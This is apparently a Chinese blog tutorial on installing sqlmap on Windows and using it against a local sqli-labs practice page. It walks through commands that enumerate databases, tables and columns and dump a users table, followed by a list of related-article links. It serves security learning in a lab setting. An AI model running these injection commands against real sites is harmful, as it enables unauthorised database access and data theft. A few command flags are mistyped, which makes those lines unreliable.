SQLMAP安装及使用教程
自动化SQL注入神器:
SQLMAP,功能时发现并利用指定的URL的SQL注入漏洞。支持的数据库:MySQL、Oracle、MSSQLserver、Access、DB2等
百度网盘
链接:https://pan.baidu.com/s/1xfQiWsFu17SEGcb4tB6jjw
提取码: 5yqd
SQLMAP的安装:
一、安装python环境
python-3.8.2-amd64
安装中选中:Add python3.8 to path,只有不用手动配置python的环境变量!选择自定义安装
点击next,这里可以修改储存路径,我是虚拟机,就扔C盘了
点击install
Win+r输入cmd进入命令框,输入python,安装成功
二、安装SQLMAP
重命名为sqlmap
三、生成SQLMAP快捷方式
桌面右键创建快捷方式
输入cmd
名称写为花花(最好写成SQLMAP,以免忘记,你也可以叫别的名字比如草草什么的)
在生成的SQLMAP下右键属性,修改起始位置为你储存sqlmap的起始位置,点击应用,确定
进来就是这样的
四、SQLMAP注入模式:
1.布尔盲注
2.时间盲注
3.报错注入
4.union联合注入
5.堆叠注入
SQLMAP的应用:(拿sqlilabs less8举例)
常用选项:
-u:指定url
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --dbms:指定数据库类型
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --dbms=mysql
--os:指定操作系统
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --os=linux
--proxy:指定代理
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --proxy 代理的url
--data:指定POST方式提交的数据
sqlmap.py -u http://127.0.0.1:500/Less-8 --data=’id’=1
--flush-session :刷新缓存
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --flush-session
--cookie=COOKIE:指定访问页面的cookies信息
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --cookie="PHPSESSID=a8d127e.."
五、SQLMAP的注入流程:
--dbs:列出所有的数据库名称
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1--dbs (列出所有数据库)
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db (列出当前数据库)
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db --dbms=mysql
-D :指定数据库
-T:指定数据表
-C:指定列名称
--tables:列出指定数据库中的所有表
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security --tables
--columns:列出指定库中的[指定表的]所有列
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -columns
--dump:列出指定库中的表中的数据
sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -T users -dump
SQLMAP安装及使用教程相关推荐
- 【无标题】【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了
一.sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入.目前支持的数据库有MySql.Oracle.Access.PostageSQL. ...
- linux下sqlmap安装教程,(转)Sqlmap官网下载与安装教程[windows/linux版本]
转自:http://www.vuln.cn/2000 sqlmap的功能与强大性不必多言,方便大家下载,给大家整理了下sqlmap最新版的官网与github下载地址. 官网下载地址 github下载 ...
- Termux 高级终端安装使用配置教程
Termux 高级终端安装使用配置教程,这篇文章拖了有小半年.因为网上相关的文章相对来说还是比较少的,恰好今天又刷了机,所以就特意来总结一下,希望本文可以帮助到其他的小伙伴.发挥Android平台更大 ...
- mysql数据库解压安装教程_MySQL数据库之windows 10下解压版MySql安装配置方法教程...
本文主要向大家介绍了MySQL数据库之windows 10下解压版MySql安装配置方法教程 ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助. windows 10 下安装解压版的 ...
- codeblocks安装及使用教程(手把手傻瓜式教学)
1.首先去codeblocks官网下载最新版codeblocks安装包. 2.双击下载的包,看到如下界面. 3.点击next,进行下一步. 4.点击I agree. 5.点击next,进行下一步. 6 ...
- linux_OEL5.4_安装Oracle11g中文教程图解
一.安装ORACLE10g 软件(11.2.0.0) 参考pdf:链接:http://pan.baidu.com/s/1pLHU94J 密码:keo8 (一)安装前的包支持 1. 虚拟机yum 环境搭 ...
- 安装phpMyAdmin图文教程
phpmyadmin的安装配置已经是老生常谈的话题了,网络上到处都可以找到相关的配置教程.但是,那些大多都是手动配置的,稍不留神,容易出错.因此站长今天在这里介绍的是,被很多phpmyadmin用户所 ...
- mysql超详细教程_MySQL8.0.23安装超详细教程
前言 最近在做一个人脸识别的项目,需要用数据库保存学生信息与前段交互. MySQL的优点 1.mysql性能卓越,服务稳定,很少出现异常宕机. 2.mysql开放源代码且无版权制约,自主性及使用成本低 ...
- TensorRT安装及使用教程
常见网络tensorrt c++版实现: https://github.com/wang-xinyu/tensorrtx 参考:TensorRT安装及使用教程_ZONGXP的博客-CSDN博客_ten ...
- 六丶青龙的依赖库+拉库+互助安装及使用教程
六丶青龙的依赖库+互助安装及使用教程 没有服务器的先自行购买,这里推荐腾讯云2H4G8M首年70–点击购买 青龙面板安装教程 QQ交流:1014549449 --------------点击跳转 青龙 ...
最新文章
- C++中的new和malloc的区别
- 快速傅立叶变换(FFT)算法(原来这就是蝶形变换)
- Week 1 Team Homework #3 from Z.XML-软件工程在北航
- windows查看进程
- Android 如何在Eclipse中查看Android API源码 及 support包源码
- lisp 所在图幅号计算_图幅编号的计算
- 从头开始学JavaScript (九)——执行环境和作用域
- 根据一览,自动生成Sheet页
- XML文件解析 --------------------笔记
- mongodb 非 admin 库 认证登陆失败 原因(百度好多都 是渣)db.addUser() 请走开。
- matlab中的线性规划
- Python解压zip和rar文件
- pyinstaller包含html文件,pyinstaller打包exe
- ssh和rsh的区别、Linux rsh命令
- 计算机应用大赛动员大会,计算机应用工程系第十二届学生会动员大会
- 2016大学计算机陈春丽,2016级计算机类专业分流结果公示.PDF
- 总结VUE控制滚动滑动方法
- 中华女子学院计算机考试题库,中华女子学院综合素质测试面试题历年总结
- Jenkins系列之——前言 Jenkins初识
- LDAP unexpected response: 500